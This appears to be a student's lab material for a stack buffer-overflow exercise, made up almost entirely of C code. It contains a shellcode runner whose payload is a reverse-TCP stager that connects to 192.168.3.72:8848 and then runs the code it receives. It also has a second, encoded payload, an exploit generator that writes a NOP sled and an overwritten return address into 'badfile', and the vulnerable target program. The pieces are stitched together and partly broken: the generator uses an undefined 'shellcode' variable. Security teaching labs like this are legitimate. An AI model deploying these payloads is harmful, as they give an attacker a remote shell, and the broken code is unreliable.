Call shellcode.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
unsigned char buf[] =
"\x6a\x0a\x5e\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66"
"\x89\xe1\xcd\x80\x97\x5b\x68\xc0\xa8\x03\x48\x68\x02\x00"
"\x22\x90\x89\xe1\x6a\x66\x58\x50\x51\x57\x89\xe1\x43\xcd"
"\x80\x85\xc0\x79\x19\x4e\x74\x3d\x68\xa2\x00\x00\x00\x58"
"\x6a\x00\x6a\x05\x89\xe3\x31\xc9\xcd\x80\x85\xc0\x79\xbd"
"\xeb\x27\xb2\x07\xb9\x00\x10\x00\x00\x89\xe3\xc1\xeb\x0c"
"\xc1\xe3\x0c\xb0\x7d\xcd\x80\x85\xc0\x78\x10\x5b\x89\xe1"
"\x99\xb2\x6a\xb0\x03\xcd\x80\x85\xc0\x78\x02\xff\xe1\xb8"
"\x01\x00\x00\x00\xbb\x01\x00\x00\x00\xcd\x80";
int main(int argc, char **argv)
{
int (*func)() = (int(*)())buf;
func();
return 1;
}
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
unsigned char buf[] =
"\xdb\xd9\xbe\xa1\x3a\x0d\x3e\xd9\x74\x24\xf4\x5a\x29\xc9"
"\xb1\x1f\x31\x72\x1a\x83\xc2\x04\x03\x72\x16\xe2\x54\x50"
"\x07\x60\xa7\x7e\xe0\x7f\x94\xc3\x5c\xea\x18\x74\x04\x63"
"\xfd\xb9\x49\xe4\xa6\x29\x8a\xa3\x5b\xe2\x62\xb6\x5b\xd0"
"\xe2\x3f\xba\x7e\x65\x18\x6c\x2e\x3e\x11\x6d\x93\x0d\xa1"
"\xe8\xd4\xf7\xbb\xbc\xa0\x3a\xd4\xe2\x49\x45\x24\xba\x23"
"\x45\x4e\x3f\x3d\xa6\xbf\xf6\xf0\xa9\x45\xc8\x72\x17\xae"
"\xef\x36\x60\x88\xef\x26\x6f\xea\x66\xa5\xae\x01\x74\xeb"
"\xd2\xda\x34\x96\xd9\x63\xb1\xa9\x9a\x73\xe2\xa0\xba\xed"
"\xa6\xd9\x8c\x0d\x0b\x9d\x68\xd1\xeb\x9c\x8d\x33\xb3\xa0"
"\x71\xb4\xc3\x19\x70\xb4\xc3\x5d\xbe\x34";
void main(int argc, char **argv )
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset (&buffer, 0x90, 517) ;
/* You need to fill the buffer with appropriate contents here*/
strcpy(buffer+100, shellcode);
strcpy(buffer+0x24, "\xcb\xeb\xff\xbf");
badfile = fopen(". /badfile","w");
fwrite(buffer, 517, 1, badfile) ;
fclose (badfile);
}
stack.c:
/* Vunlerable program: stack.c */ /* You can get this program from the lab's website */ #include <stdlib.h> #include <stdio.h> #include <string.h> #ifndef BUF_SIZE #define BUF_SIZE 24 #endif int bof(char *str) { char buffer[BUF_SIZE]; /* The following statement has a buffer overflow problem */ strcpy(buffer, str); return 1; } int main(int argc, char **argv) { char str[517]; FILE *badfile; char dummy[BUF_SIZE]; memset(dummy, 0, BUF_SIZE); badfile = fopen("badfile", "r"); fread(str, sizeof(char), 517, badfile); bof(str); printf("Returned Properly\n"); return 1; } |